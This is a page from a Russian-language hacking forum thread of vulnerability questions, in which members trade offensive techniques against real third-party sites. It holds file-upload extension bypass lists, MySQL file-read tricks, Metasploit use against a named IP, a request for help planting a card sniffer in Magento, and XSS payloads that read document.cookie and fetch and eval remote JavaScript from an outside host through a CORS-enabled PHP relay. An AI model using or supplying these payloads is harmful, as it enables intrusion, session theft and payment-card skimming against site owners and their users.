Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    Спс, БабаДук!
    Сразу наш0л много чего интересного в практически безнадёжных вариантах!
    Плюсую
    +
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ксорил числа?
    алгоритм такой
     
  3. ShpillyWilly

    ShpillyWilly New Member

    Joined:
    27 Sep 2012
    Messages:
    71
    Likes Received:
    3
    Reputations:
    0
    Товарищи, есть такой вопрос.
    Есть доступ к PMA, file_priv есть, но на мускуле стоит --secure-file-priv, а это значит, что я могу проводить операции с файлами только в рамках дефлтовой мускульной директории. Файлы сервака(psswd, конфиг апача) мне удалось почитать через LOAD DATA LOCAL INFILE, загружая их содержимое в мной созданную таблицу. В итоге у меня есть раскрытые пути, но есть ли вариант залиться куда-нибудь, кроме директории, указанной в --secure-file-priv ? или это без шансов и надо искать другой вектор? Спасибо.
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    файлы проекта попробовать почитать, посмотреть как он с данными из бд работает
     
    _________________________
    panic.ker and ShpillyWilly like this.
  5. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Metasploit показывает 3 уязвимости + модули к этим уязвимостям, но получить сессию не получается почему ?
     
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    ХОЗЯИН ТИП ОТКРЫТ ОПИСАНИЕ МОДУЛЬ АТАКИ
    107.154.249.133 - 107.154.249.133.ip.incapdns.net
    Уязвим к exploit/multi/misc/java_rmi_server
    Но не подключится, это как пример на другом сервере 3 уязвимости
     
  7. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Сама страница получяет такои ответ от сервера
    Code:
    0.72611600+15169956671.php.jpg
    А в итоге картинка на странице выводется так
    Code:
    000/013/927/000013927615.jpg
    Вопрос как все генерируется куда копать?
     
  8. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Пробуйте подменить заголовок application-jpg
    Мне помогла статья
    https://habrahabr.ru/post/148999/
     
  9. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Нашел " /.svn/entries" в этом файле могут быть захешированные пароли? Нашел только логины и странные обозначения и калаоги:
    Code:
    2015-11-19T15:19:41.000000Z
    345d3c642a73d0f3d463fb1aba2b3e74
    2015-11-19T14:39:32.670226Z
    
    launcher
    dir
    
    auth
    dir
    
    
     
  10. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Парни подскажите что можно сделать??!
    http://school2.perm.ru/administrator и таких дырок в каждой директории.Попробовал заюзать RFI LFI -безуспешно.
    P.S. Есть мысли ???может кто поможет в этом направлении?
     
  11. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    Там нет ни LFI, ни RFI. Я объясню почему так.
    В движке этого сайта не предусмотрен mod_rewrite, посему обращение в файлам происходит напрямую с помощью include(); "administrator" - это не файл, посему идёт обращение как в папке. Движок нам говорит, что он обращается к дефолтному index.php (то есть получается движок инклудит так: $_GET["path"]."/index.php"), а его там нет и происходит эта ошибка. Если вместо administrator ввести любое другое значение - реакция будет такая же.

    Данное можно трактовать как обычное раскрытие полного пути.
     
    crlf likes this.
  12. xaphan

    xaphan Member

    Joined:
    29 Jan 2018
    Messages:
    6
    Likes Received:
    10
    Reputations:
    4
    Вряд ли там будут какие-то данные в открытом виде. Это ж система контроля версий (как и гит). Можно попытаться получить все файлы с исходными кодами, вот посоветую этот скрипт.
     
    Muracha and crlf like this.
  13. CoolHucker

    CoolHucker New Member

    Joined:
    12 Feb 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Спасибо за толкование.только неужели нельзя добраться до этого сайта никак?)
     
  14. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    87
    Likes Received:
    69
    Reputations:
    3
    Можно. Только за тебя это делать никто не будет. Это ветка вопросов по уязвимостям, а не по просьбам о взломе. Найди уязвимость, а растолковать и прояснить моменты-мы всегда за.
     
    erwerr2321, auth_root and crlf like this.
  15. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Посоветуите нормальныи большои список bypass extension для картинок
    Code:
    image.php.jpg
    image.jpg.php
    image.php;.jpg
    image.php%00.jpg
    image.php\0.jpg
    
     
  16. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    спасибо! помогло!
    А есть ли подобная вещь для WYSIWYG? заточенная на поиск загрузку файлов и тд
    dirb использую, dirbuster тоже но интересует более узкоспециализированное
     
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Magento Version 1.8.1.0
    Кто нить устанавливал снифер на эту версию? нужна помощь, в каком файле данные обрабатываются?
     
  18. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть такои XSS вектор
    Code:
    <img name="alert(document.cookie)" onerror="eval(name)" src="" />
    Хочу сделать скриншот странице админа, нашел все необходимое, но скрипта очень много и засунуть в name="" получится но и за непонятнои фильтрации он никак не заработает, вариант такои засунуть в name="" что то типа инклуда и заинклудить весь .js, какие варианты инклуда есть типо
    Code:
    <img name="include(https:/host/script.js)" onerror="eval(name)" src="" />
    ЕСТЬ В JS ИНКЛУД ЧЕРЕЗ JS?
     
  19. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    HTML:
    <img name="xhr=new XMLHttpRequest();xhr.open('GET','https:/host/script.php',false);xhr.send();xhr.responseText" onerror="eval(eval(name))" src="" />
    нужно учитывать, что для кроссдоменных запросов от сервера должен приходить заголовок Access-Control-Allow-Origin, поэтому мы делаем запрос не прямиком к js файлу а к php, который отправляет нужный нам заголовок и содержимое js пейлоада

    содержимое самого php:
    PHP:
    <?php

    header
    ("Access-Control-Allow-Origin: *");
    echo 
    file_get_contents("payload.js");

    ?>
     
    #2239 dmax0fw, 6 Feb 2018
    Last edited: 6 Feb 2018
    cat1vo and crlf like this.
  20. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Не хочет
    Code:
    <p><img name="xhr=new XMLHttpRequest();xhr.open('GET','http://host/images/s/s.php',false);xhr.send();xhr.responseText" onerror="eval(name)" /></p>
    s.php
    Code:
    <?php
    
    header("Access-Control-Allow-Origin: *");
    echo file_get_contents("alert.js");
    
    ?>
    http://host/images/s/s.php
    Code:
    alert("1");